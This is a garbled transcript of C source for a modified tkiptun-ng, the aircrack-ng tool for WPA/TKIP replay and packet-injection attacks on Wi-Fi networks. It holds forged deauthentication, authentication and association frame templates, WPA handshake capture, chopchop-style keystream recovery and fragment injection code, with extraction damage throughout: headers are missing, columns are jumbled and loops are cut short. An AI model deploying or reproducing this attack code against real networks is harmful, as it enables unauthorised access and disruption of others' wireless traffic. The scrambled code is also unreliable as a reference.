Tkiptun-ng No QoS
If you can't read please download the document
Transcript of Tkiptun-ng No QoS
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
802.11 WPA replay & injection attacks Copyright (C) 2008, 2009 Martin Beck WEP decryption attack (chopchop) developed by KoreK This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA In addition, as a special exception, the copyright holders give permission to link the code of portions of this program with the OpenSSL library under certain conditions as described in each individual source file, and distribute linked combinations including the two. You must obey the GNU General Public License in all respects for all of the code used other than OpenSSL. * If you modify file(s) with this exception, you may extend this exception to your version of the file(s), but you are not obligated to do so. * If you do not wish to do so, delete this exception statement from your version. * If you delete this exception statement from all source files in the program, then also delete it here.
#if defined(linux) #include #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include
#include #include
#include #include #include #include #include #include #include #include "version.h" "pcap.h" "osdep/osdep.h" "crypto.h"
#define ARPHRD_IEEE80211 801 #define ARPHRD_IEEE80211_PRISM 802 #define ARPHRD_IEEE80211_FULL 803 #ifndef ETH_P_80211_RAW #define ETH_P_80211_RAW 25 #endif #define RTC_RESOLUTION 8192 #define REQUESTS #define MAX_APS #define NEW_IV 1 #define RETRY 2 #define ABORT 3 #define DEAUTH_REQ \ "\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00" #define AUTH_REQ \ "\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00" #define ASSOC_REQ \ "\x00\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xC0\x00\x31\x04\x64\x00" #define NULL_DATA \ "\x48\x01\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xBB\xBB\xBB\xBB\xBB\xBB\xE0\x1B" #define RTS \ "\xB4\x00\x4E\x04\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" #define RATES \ "\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C" #define PROBE_REQ \ "\x40\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC" \ "\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00" #define PCT { struct tm *lt; time_t tc = time( NULL ); \ lt = localtime( &tc ); printf( "%02d:%02d:%02d ", \ lt->tm_hour, lt->tm_min, lt->tm_sec ); } #define RATE_NUM 12 30 20
#define #define #define #define #define #define #define #define #define #define #define #define
RATE_1M 1000000 RATE_2M 2000000 RATE_5_5M 5500000 RATE_11M 11000000 RATE_6M 6000000 RATE_9M 9000000 RATE_12M 12000000 RATE_18M 18000000 RATE_24M 24000000 RATE_36M 36000000 RATE_48M 48000000 RATE_54M 54000000
#define DEFAULT_MIC_FAILURE_INTERVAL 60 static uchar ZERO[32] = "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00"; int bitrates[RATE_NUM]={RATE_1M, RATE_2M, RATE_5_5M, RATE_6M, RATE_9M, RATE_11M, RATE_12M, RATE_18M, RATE_24M, RATE_36M, RATE_48M, RATE_54M}; extern char * getVersion(char * progname, int maj, int min, int submin, int svnr ev, int beta); extern char * searchInside(const char * dir, const char * filename); extern int maccmp(unsigned char *mac1, unsigned char *mac2); extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac ); extern int check_crc_buf( unsigned char *buf, int len ); extern const unsigned long int crc_tbl[256]; extern const unsigned char crc_chop_tbl[256][4]; extern int hexStringToHex(char* in, int length, unsigned char* out); char usage[] = "\n" " %s - (C) 2008, 2009 Thomas d\'Otreppe\n" " http://www.aircrack-ng.org\n" "\n" " usage: tkiptun-ng \n" "\n" " Filter options:\n" "\n" " -d dmac : MAC address, Destination\n" " -s smac : MAC address, Source\n" " -m len : minimum packet length (default: 80) \n" " -n len : maximum packet length (default: 80)\n" " -t tods : frame control, To DS bit\n" " -f fromds : frame control, From DS bit\n" " -D : disable AP detection\n" " -Z : select packets manually\n" "\n" " Replay options:\n" "\n" " -x nbpps : number of packets per second\n" " -a bssid : set Access Point MAC address\n"
" -c dmac : set Destination MAC address\n" " -h smac : set Source MAC address\n" " -e essid : set target AP SSID\n" " -M sec : MIC error timout in seconds [60]\n" "\n" " Debug options:\n" "\n" " -K prga : keystream for continuation\n" " -y file : keystream-file for continuation\n" " -j : inject FromDS packets\n" " -P pmk : pmk for verification/vuln testing\n" " -p psk : psk to calculate pmk with essid\n" "\n" " source options:\n" "\n" " -i iface : capture packets from this interface\n" " -r file : extract packets from this pcap file\n" "\n" " --help : Displays this usage screen\n" "\n"; struct WPA_hdsk { unsigned char stmac[6]; */ unsigned char snonce[32]; */ unsigned char anonce[32]; */ unsigned char keymic[16]; */ unsigned char eapol[256]; */ int eapol_size; */ int keyver; AES) */ int state; */ }; struct options { unsigned char f_bssid[6]; unsigned char f_dmac[6]; unsigned char f_smac[6]; int f_minlen; int f_maxlen; int f_minlen_set; int f_maxlen_set; int f_type; int f_subtype; int f_tods; int f_fromds; int f_iswep; FILE *f_ivs; int r_nbpps; int r_fctrl; /* output ivs file */
/* supplicant MAC /* supplicant nonce /* authenticator nonce /* eapol frame MIC /* eapol frame contents /* eapol frame size /* key version (TKIP / /* handshake completion
unsigned char r_bssid[6]; unsigned char r_dmac[6]; unsigned char r_smac[6]; unsigned char r_apmac[6]; unsigned char r_dip[4]; unsigned char r_sip[4]; char r_essid[33]; int r_fromdsinj; char r_smac_set; char ip_out[16]; char ip_in[16]; int port_out; int port_in; char *iface_out; char *s_face; char *s_file; uchar *prga; int a_mode; int a_count; int a_delay; int ringbuffer; int ghost; int prgalen; int delay; int npackets; int fast; int bittest; int nodetect; unsigned char oldkeystream[2048]; /* user-defined old keystream */ int oldkeystreamlen; /* user-defined old keystream length */ char wpa_essid[256]; /* essid used for calculating the pmk out of the psk */ char psk[128]; uchar pmk[128]; uchar ptk[80]; ndshake */ uchar ip_cli[4]; uchar ip_ap[4]; int got_ptk; int got_pmk; int got_psk; int got_mic_fromds; int got_mic_tods; int got_ip_ap; int got_ip_client; /* shared passphrase among the clients */ /* pmk derived from the essid and psk */ /* ptk calculated from all pieces captured in the ha //16 for 15 chars + \x00
struct WPA_hdsk wpa; /* valid WPA handshake data */ struct WPA_ST_info wpa_sta; /* used to calculate the pmk */ time_t wpa_time; /* time when the wpa handshake arrived */ unsigned char *chopped_from_plain; P */ /* chopped plaintext packet from the A
unsigned char *chopped_to_plain; */ unsigned char *chopped_from_prga; unsigned char *chopped_to_prga; int chopped_from_plain_len; int chopped_to_plain_len; int chopped_from_prga_len; int chopped_to_prga_len; struct timeval last_mic_failure; int mic_failure_interval; } opt; struct devices { int fd_in, arptype_in; int fd_out, arptype_out; int fd_rtc; unsigned char mac_in[6]; unsigned char mac_out[6]; int int int int int is_wlanng; is_hostap; is_madwifi; is_madwifing; is_bcm43xx;
/* chopped plaintext packet to the AP /* chopped keystream from the AP */ /* chopped keystream to the AP */
/* timestamp of last mic failure */ /* time between allowed mic failures */
FILE *f_cap_in; struct pcap_file_header pfh_in; } dev; static struct wif *_wi_in, *_wi_out; struct ARP_req { unsigned char *buf; int hdrlen; int len; }; struct APt { unsigned char set; unsigned char found; unsigned char len; unsigned char essid[255]; unsigned char bssid[6]; unsigned char chan; unsigned int ping[REQUESTS]; int pwr[REQUESTS]; }; struct APt ap[MAX_APS]; unsigned long nb_pkt_sent; unsigned char h80211[4096];
unsigned char tmpbuf[4096]; unsigned char srcbuf[4096]; char strbuf[512]; uchar ska_auth1[] 0\x00\x00" 0"; uchar ska_auth3[4096] = "\xb0\x40\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00" "\x00\x00\x00\x00\x00\x00\xc0\x01"; int ctrl_c, alarmed; char * iwpriv; unsigned char noQOS[4096]; // Este ser el buffer temporal para forjar paquetes Q oS si no est habilitado void sighandler( int signum ) { if( signum == SIGINT ) ctrl_c++; if( signum == SIGALRM ) alarmed++; } int reset_ifaces() { //close interfaces if(_wi_in != _wi_out) { if(_wi_in) { wi_close(_wi_in); _wi_in = NULL; } if(_wi_out) { wi_close(_wi_out); _wi_out = NULL; } } else { if(_wi_out) { wi_close(_wi_out); _wi_out = NULL; _wi_in = NULL; } } /* open the replay interface */ _wi_out = wi_open(opt.iface_out); if (!_wi_out) return 1; = "\xb0\x00\x3a\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 "\x00\x00\x00\x00\x00\x00\xb0\x01\x01\x00\x01\x00\x00\x0
dev.fd_out = wi_fd(_wi_out); /* open the packet source */ if( opt.s_face != NULL ) { _wi_in = wi_open(opt.s_face); if (!_wi_in) return 1; dev.fd_in = wi_fd(_wi_in); wi_get_mac(_wi_in, dev.mac_in); } else { _wi_in = _wi_out; dev.fd_in = dev.fd_out; /* XXX */ dev.arptype_in = dev.arptype_out; wi_get_mac(_wi_in, dev.mac_in); } wi_get_mac(_wi_out, dev.mac_out); return 0; } int set_bitrate(struct wif *wi, int rate) { int i, newrate; if( wi_set_rate(wi, rate) ) return 1; // // d if (rate == 5500000 && wi_get_rate(wi) != 5500000) { if( wi_set_rate(wi, 5000000) ) return 1; } newrate = wi_get_rate(wi); for(i=0; i0 ) { if(bitrates[i-1] >= newrate) { printf("Couldn't set rate to %.1fMBit. (%.1fMBit instead)\n" if( reset_ifaces() ) return 1; //Workaround for buggy drivers (rt73) that do not accept 5.5M, but 5M instea
, (rate/1000000.0), (wi_get_rate(wi)/1000000.0)); return 1; } } if( i 1) { z += 2; //skip ethertype /* frame 1: Pairwise == 1, Install == 0, Ack == 1, MIC == 0 */ if( ( packet[z + 6] & 0x08 ) != 0 && ( packet[z + 6] & 0x40 ) == 0 ( packet[z + 6] & 0x80 ) != 0 ( packet[z + 5] & 0x01 ) == 0 { memcpy( opt.wpa.anonce, &packet[z opt.wpa.state = 1; } && && ) + 17], 32 );
/* frame 2 or 4: Pairwise == 1, Install == 0, Ack == 0, MIC == 1 */ if( z+17+32 > length ) return 0; if( ( packet[z + 6] & 0x08 ) != 0 && ( packet[z + 6] & 0x40 ) == 0 && ( packet[z + 6] & 0x80 ) == 0 && ( packet[z + 5] & 0x01 ) != 0 ) { if( memcmp( &packet[z + 17], ZERO, 32 ) != 0 ) { memcpy( opt.wpa.snonce, &packet[z + 17], 32 ); opt.wpa.state |= 2; } if( (opt.wpa.state & 4) != 4 ) { opt.wpa.eapol_size = ( packet[z + 2] 4; } if (wi_write(wi, buf, count, NULL) == -1) { switch (errno) { case EAGAIN: case ENOBUFS: usleep(10000); return 0; /* XXX not sure I like this... -sorbo */ } perror("wi_write()"); return -1; } nb_pkt_sent++; return 0; } int read_packet(void *buf, size_t count, struct rx_info *ri)
{ struct wif *wi = _wi_in; /* XXX */ int rc; rc = wi_read(wi, buf, count, ri); if (rc == -1) { switch (errno) { case EAGAIN: return 0; } perror("wi_read()"); return -1; } return rc; } void read_sleep( int usec ) { struct timeval tv, tv2, tv3; int caplen; fd_set rfds; gettimeofday(&tv, NULL); gettimeofday(&tv2, NULL); tv3.tv_sec=0; tv3.tv_usec=10000; while( ((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec )) < (usec) ) { FD_ZERO( &rfds ); FD_SET( dev.fd_in, &rfds ); if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv3 ) < 0 ) { continue; } if( FD_ISSET( dev.fd_in, &rfds ) ) { caplen = read_packet( h80211, sizeof( h80211 ), NULL ); check_received(h80211, caplen); } usleep(1000); gettimeofday(&tv2, NULL); } } int filter_packet( unsigned char *h80211, int caplen ) { int z, mi_b, mi_s, mi_d, ext=0, qos=0; if(caplen opt.f_maxlen ) return( 1 ); /* check the frame control bytes */ // // if( ( h80211[0] & 0x80 ) != 0x80 ) return( 1 ); //no QoS packet if( ( h80211[0] & 0x0C ) != ( opt.f_type opt.f_type >= 0 ) return( 1 ); = 0 ) return( 1 ); ) &&
if( ( h80211[1] & 0x02 ) != ( opt.f_fromds = 0 ) return( 1 ); if( ( h80211[1] & 0x40 ) != ( opt.f_iswep opt.f_iswep >= 0 ) return( 1 ); /* check the extended IV (TKIP) flag */ // // if( opt.f_type == 2 && opt.f_iswep == 1 && ( h80211[z + 3] & 0x20 ) != 0 ) return( 1 ); /* MAC address checking */ switch( h80211[1] { case 0: mi_b case 1: mi_b case 2: mi_b default: mi_b } & 3 ) = = = = 16; 4; 10; 10; mi_s mi_s mi_s mi_d = = = = 10; 10; 16; 16; mi_d mi_d mi_d mi_s = = = = 4; 16; 4; 24; break; break; break; break; 100 00*1000) //wait 10sec for beacon frame { return -1; } if(len len) continue; chan = pkt_sniff[pos+2]; if(essid) { pos = 0; taglen = 22; arted taglen+= 12; //skip fixed tags in frames do { pos += taglen + 2; tagtype = pkt_sniff[pos]; taglen = pkt_sniff[pos+1]; } while(tagtype != 0 && pos < len-2); if(tagtype != 0) continue; if(taglen len) continue; if(taglen > 32)taglen = 32; if((pkt_sniff+pos+2)[0] < 32 && memcmp(bssid, pkt_sniff+10, 6) = = 0) { break; } /* if bssid is given, copy essid */ if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strle n(essid) == 0) { memset(essid, 0, 33); memcpy(essid, pkt_sniff+pos+2, taglen); break; } /* if essid is given, copy bssid AND essid, so we can handle cas e insensitive arguments */ if(bssid != NULL && memcmp(bssid, NULL_MAC, 6) == 0 && strncasec mp(essid, (char*)pkt_sniff+pos+2, taglen) == 0 && strlen(essid) == (unsigned)tag len) { memset(essid, 0, 33); memcpy(essid, pkt_sniff+pos+2, taglen); memcpy(bssid, pkt_sniff+10, 6); printf("Found BSSID \"%02X:%02X:%02X:%02X:%02X:%02X\" to giv en ESSID \"%s\".\n", bssid[0], bssid[1], bssid[2], bssid[3], bssid[4], bssid[5], essid); break; }
//initial value to get the fixed tags parsing st
/* if essid and bssid are given, check both */ if(bssid != NULL && memcmp(bssid, pkt_sniff+10, 6) == 0 && strle n(essid) > 0) { memset(essid2, 0, 33); memcpy(essid2, pkt_sniff+pos+2, taglen); if(strncasecmp(essid, essid2, taglen) == 0 && strlen(essid) == (unsigned)taglen) break; else { printf("For the given BSSID \"%02X:%02X:%02X:%02X:%02X:% 02X\", there is an ESSID mismatch!\n", bssid[0], bssid[1], bssid[2], bssid[3], b ssid[4], bssid[5]); printf("Found ESSID \"%s\" vs. specified ESSID \"%s\"\n" , essid2, essid); printf("Using the given one, double check it to be sure its correct!\n"); break; } } } } } if(capa) memcpy(capa, pkt_sniff+34, 2); return chan; } /* if bssid != NULL its looking for a beacon frame */ int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi) { int ap_chan=0, iface_chan=0; iface_chan = wi_get_channel(wi); if(bssid != NULL) { ap_chan = wait_for_beacon(bssid, capa, essid); if(ap_chan < 0) { PCT; printf("No such BSSID available.\n"); return -1; } if(ap_chan != iface_chan) { PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_ get_ifname(wi), iface_chan, ap_chan); return -1; } } return 0; } int getnet( uchar* capa, int filter, int force)
{ unsigned char *bssid; if(opt.nodetect) return 0; if(filter) bssid = opt.f_bssid; else bssid = opt.r_bssid; if( memcmp(bssid, NULL_MAC, 6) ) { PCT; printf("Waiting for beacon frame (BSSID: %02X:%02X:%02X:%02X:%02X:% 02X) on channel %d\n", bssid[0],bssid[1],bssid[2],bssid[3],bssid[4],bssid[5],wi_get _channel(_wi_in)); } else if(strlen(opt.r_essid) > 0) { PCT; printf("Waiting for beacon frame (ESSID: %s) on channel %d\n", opt. r_essid,wi_get_channel(_wi_in)); } else if(force) { PCT; if(filter) { printf("Please specify at least a BSSID (-b) or an ESSID (-e)\n"); } else { printf("Please specify at least a BSSID (-a) or an ESSID (-e)\n"); } return( 1 ); } else return 0; if( attack_check(bssid, opt.r_essid, capa, _wi_in) != 0) { if(memcmp(bssid, NULL_MAC, 6)) { if( strlen(opt.r_essid) == 0 || opt.r_essid[0] < 32) { printf( "Please specify an ESSID (-e).\n" ); } } if(!memcmp(bssid, NULL_MAC, 6)) { if(strlen(opt.r_essid) > 0) { printf( "Please specify a BSSID (-a).\n" ); } } return( 1 ); }
return 0; } int xor_keystream(uchar *ph80211, uchar *keystream, int len) { int i=0; for (i=0; i 0 ) { tr = time( NULL ); printf( "\rRead %ld packets...\r", nb_pkt_read ); fflush( stdout ); } if( opt.s_file == NULL ) { FD_ZERO( &rfds ); FD_SET( dev.fd_in, &rfds ); tv.tv_sec = 1; tv.tv_usec = 0; if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 )
{ if( errno == EINTR ) continue; perror( "select failed" ); return( 1 ); } if( ! FD_ISSET( dev.fd_in, &rfds ) ) continue; gettimeofday( &tv, NULL ); *caplen = read_packet( h80211, sizeof( h80211 ), NULL ); if( *caplen < 0 ) return( 1 ); if( *caplen == 0 ) continue; } else { /* there are no hidden backdoors in this source code */ n = sizeof( pkh ); if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 ) { printf( "\r\33[KEnd of file.\n" ); return( 1 ); } if( dev.pfh_in.magic == TCPDUMP_CIGAM ) SWAP32( pkh.caplen ); tv.tv_sec = pkh.tv_sec; tv.tv_usec = pkh.tv_usec; n = *caplen = pkh.caplen; if( n (int) sizeof( h80211 ) || n > (int) sizeof( tmpbuf ) ) { printf( "\r\33[KInvalid packet length %d.\n", n ); return( 1 ); } if( fread( h80211, n, 1, dev.f_cap_in ) != 1 ) { printf( "\r\33[KEnd of file.\n" ); return( 1 ); } if( dev.pfh_in.linktype == LINKTYPE_PRISM_HEADER ) { if( h80211[7] == 0x40 ) n = 64; else n = *(int *)( h80211 + 4 ); if( n < 8 || n >= (int) *caplen ) continue; memcpy( tmpbuf, h80211, *caplen );
*caplen -= n; memcpy( h80211, tmpbuf + n, *caplen ); } } nb_pkt_read++; if( filter_packet( h80211, *caplen ) != 0 ) continue; if(opt.fast) break; z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30; if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */ z+=2; switch( h80211[1] { case 0: mi_b case 1: mi_b case 2: mi_b case 3: mi_t ak; // WDS packet } & 3 ) = = = = 16; 4; 10; 10; mi_s mi_s mi_s mi_r = = = = 10; 10; 16; 4; mi_d mi_d mi_d mi_d = = = = 4; 16; 4; 16; is_wds is_wds is_wds mi_s = = 0; break; = 0; break; = 0; break; 24; is_wds = 1; bre
printf( "\n\n Size: %d, FromDS: %d, ToDS: %d", *caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) ); if( ( h80211[0] & 0x0C ) == 8 && ( h80211[1] & 0x40 ) != 0 ) { // if (is_wds) key_index_offset = 33; // WDS packets have an additio nal MAC, so the key index is at byte 33 // else key_index_offset = 27; key_index_offset = z+3; if( ( h80211[key_index_offset] & 0x20 ) == 0 ) printf( " (WEP)" ); else printf( " (WPA)" ); } printf( "\n\n" ); if (is_wds) { printf( " Transmitter = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_t ], h80211[mi_t + 1], h80211[mi_t + 2], h80211[mi_t + 3], h80211[mi_t + 4], h80211[mi_t + 5] ); printf( " h80211[mi_r h80211[mi_r h80211[mi_r } else { printf( " h80211[mi_b h80211[mi_b h80211[mi_b } Receiver = %02X:%02X:%02X:%02X:%02X:%02X\n", ], h80211[mi_r + 1], + 2], h80211[mi_r + 3], + 4], h80211[mi_r + 5] ); BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n", ], h80211[mi_b + 1], + 2], h80211[mi_b + 3], + 4], h80211[mi_b + 5] );
printf( " Dest. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_d ], h80211[mi_d + 1], h80211[mi_d + 2], h80211[mi_d + 3], h80211[mi_d + 4], h80211[mi_d + 5] ); printf( " Source MAC = %02X:%02X:%02X:%02X:%02X:%02X\n", h80211[mi_s ], h80211[mi_s + 1], h80211[mi_s + 2], h80211[mi_s + 3], h80211[mi_s + 4], h80211[mi_s + 5] ); /* print a hex dump of the packet */ for( i = 0; i < *caplen; i++ ) { if( ( i & 15 ) == 0 ) { if( i == 224 ) { printf( "\n --- CUT ---" ); break; } printf( "\n } printf( "%02x", h80211[i] ); if( ( i & 1 ) != 0 ) printf( " " ); if( i == *caplen - 1 && ( ( i + 1 ) & 15 ) != 0 ) { for( j = ( ( i + 1 ) & 15 ); j < 16; j++ ) { printf( " " ); if( ( j & 1 ) != 0 ) printf( " " ); } printf( " " ); for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ ) printf( "%c", ( h80211[i - 15 + j] < 32 || h80211[i - 15 + j] > 126 ) ? '.' : h80211[i - 15 + j] ); } if( i > 0 && ( ( i + 1 ) & 15 ) == 0 ) { printf( " " ); for( j = 0; j < 16; j++ ) printf( "%c", ( h80211[i - 15 + j] < 32 || h80211[i - 15 + j] > 127 ) ? '.' : h80211[i - 15 + j] ); } } printf( "\n\nUse this packet ? " ); 0x%04x: ", i );
fflush( stdout ); ret=0; while(!ret) ret = scanf( "%s", tmpbuf ); printf( "\n" ); if( tmpbuf[0] == 'y' || tmpbuf[0] == 'Y' ) break; } if(!just_grab) { pfh_out.magic pfh_out.version_major pfh_out.version_minor pfh_out.thiszone pfh_out.sigfigs pfh_out.snaplen pfh_out.linktype
= = = = = = =
TCPDUMP_MAGIC; PCAP_VERSION_MAJOR; PCAP_VERSION_MINOR; 0; 0; 65535; LINKTYPE_IEEE802_11;
lt = localtime( (const time_t *) &tv.tv_sec ); memset( strbuf, 0, sizeof( strbuf ) ); snprintf( strbuf, sizeof( strbuf ) - 1, "replay_src-%02d%02d-%02d%02d%02d.cap", lt->tm_mon + 1, lt->tm_mday, lt->tm_hour, lt->tm_min, lt->tm_sec ); printf( "Saving chosen packet in %s\n", strbuf ); if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL ) { perror( "fopen failed" ); return( 1 ); } n = sizeof( struct pcap_file_header ); if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 ) { perror( "fwrite failed\n" ); return( 1 ); } pkh.tv_sec pkh.tv_usec pkh.caplen pkh.len = = = = tv.tv_sec; tv.tv_usec; *caplen; *caplen;
n = sizeof( pkh ); if( fwrite( &pkh, n, 1, f_cap_out ) != 1 ) { perror( "fwrite failed" ); return( 1 ); } n = pkh.caplen; if( fwrite( h80211, n, 1, f_cap_out ) != 1 ) {
perror( "fwrite failed" ); return( 1 ); } fclose( f_cap_out ); } return( 0 ); } int read_prga(unsigned char **dest, char *file) { FILE *f; int size; if(file == NULL) return( 1 ); if(*dest == NULL) *dest = (unsigned char*) malloc(1501); f = fopen(file, "r"); if(f == NULL) { printf("Error opening %s\n", file); return( 1 ); } fseek(f, 0, SEEK_END); size = ftell(f); rewind(f); if(size > 1500) size = 1500; if( fread( (*dest), size, 1, f ) != 1 ) { fprintf( stderr, "fread failed\n" ); return( 1 ); } opt.prgalen = size; fclose(f); return( 0 ); } void add_icv(uchar *input, int len, int offset) { unsigned long crc = 0xFFFFFFFF; int n=0; for( n = offset; n < len; n++ ) crc = crc_tbl[(crc ^ input[n]) & 0xFF] ^ (crc >> 8); crc = ~crc; input[len] input[len+1] input[len+2] input[len+3] return; = = = = (crc ) & (crc >> 8) & (crc >> 16) & (crc >> 24) & 0xFF; 0xFF; 0xFF; 0xFF;
} void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska) { int t, u; int data_size; uchar frag[32+fragsize]; int pack_size; int header_size=24; data_size = packet_len-header_size; packet[23] = (rand() % 0xFF); for (t=0; t+=fragsize;) { //Copy header memcpy(frag, packet, header_size); //Copy IV + KeyIndex memcpy(frag+header_size, iv, 4); //Copy data if(fragsize =data_size) frag[1] &= 251; //Fragment number frag[22] = 0; for (u=t; u-=fragsize;) { frag[22] += 1; } // frag[23] = 0; //Calculate packet lenght if(fragsize 0 && i%16 == 0)printf("\n"); printf("%02X ", packet[i]); } printf("\n\n"); } int check_guess(uchar *srcbuf, uchar *chopped, int caplen, int clearlen, uchar * arp, uchar *dmac) { int i, j, z, pos; z = ( ( srcbuf[1] & 3 ) != 3 ) ? 24 : 30; if ( ( srcbuf[0] & 0x80 ) == 0x80 ) /* QoS */ z+=2; // if(arp[22] == 192 && arp[23] == 168 && arp[24] == 178 && arp[25] == 1) // { // printf("Source: %i.%i.%i.%i; Dest: %i.%i.%i.%i\n", // arp[22], arp[23], arp[24], arp[25], arp[32], arp[33], arp[34] , arp[35] ); // } pos = caplen-z-8-clearlen; for(i=0; i 1024 || ret != 1 ) {
printf( "Invalid number of packets per second. [1-1024]\n" ) ; printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break; case 'a' : if( getmac( optarg, 1, opt.r_bssid ) != { printf( "Invalid AP MAC address.\n" printf("\"%s --help\" for help.\n", return( 1 ); } if( getmac( optarg, 1, opt.f_bssid ) != { printf( "Invalid AP MAC address.\n" printf("\"%s --help\" for help.\n", return( 1 ); } break; case 'c' : if( getmac( optarg, 1, opt.r_dmac ) != 0 ) { printf( "Invalid destination MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break; case 'h' : if( getmac( optarg, 1, opt.r_smac ) != 0 ) { printf( "Invalid source MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( getmac( optarg, 1, opt.wpa.stmac ) != 0 ) { printf( "Invalid source MAC address.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.r_smac_set=1; break; case 'e' : memset( opt.r_essid, 0, sizeof( opt.r_essid ) ); strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 ); break; case 'j' : opt.r_fromdsinj = 1; break; 0 ) ); argv[0]); 0 ) ); argv[0]);
case 'D' : opt.nodetect = 1; break; case 'y' : if( opt.prga != NULL ) { printf( "PRGA file already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( read_prga(&(opt.prga), optarg) != 0 ) { return( 1 ); } break; case 'i' : if( opt.s_face != NULL || opt.s_file ) { printf( "Packet source already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.s_face = optarg; opt.port_in = get_ip_port(opt.s_face, opt.ip_in, sizeof(opt.ip_i n)-1); break; case 'r' : if( opt.s_face != NULL || opt.s_file ) { printf( "Packet source already specified.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.s_file = optarg; break; case 'Z' : opt.fast = 0; break; case 'H' : printf( usage, getVersion("Tkiptun-ng", _MAJ, _MIN, _SUB_MIN, _R EVISION, _BETA) ); return( 1 ); case 'K' : i = 0 ; n = 0; s = optarg;
while( s[i] != '\0' ) { if ( s[i] == '-' || s[i] == ':' || s[i] == ' ') i++; else s[n++] = s[i++]; } s[n] = '\0' ; buf[0] = s[0]; buf[1] = s[1]; buf[2] = '\0'; i = 0; j = 0; while( sscanf( buf, "%x", &n ) == 1 ) { if ( n < 0 || n > 255 ) { printf( "Invalid keystream.\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } opt.oldkeystream[opt.oldkeystreamlen] = n ; opt.oldkeystreamlen++; if( i >= 64 ) break; s += 2; buf[0] = s[0]; buf[1] = s[1]; } break; case 'P' : memset( opt.pmk, 0, sizeof( opt.pmk ) ); i = hexStringToHex(optarg, strlen(optarg), opt.pmk); opt.got_pmk = 1; break; case 'p' : memset( opt.psk, 0, sizeof( opt.psk ) ); if( strlen(optarg) < 8 || strlen(optarg) > 63) { printf("PSK with invalid length specified [8-64].\n"); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } strncpy( opt.psk, optarg, sizeof( opt.psk ) - 1 ); opt.got_psk = 1; break; case 'M' : ret = sscanf( optarg, "%d", &opt.mic_failure_interval ); if( opt.mic_failure_interval < 0 ) { printf( "Invalid MIC error timeout. [>=0]\n" ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } break;
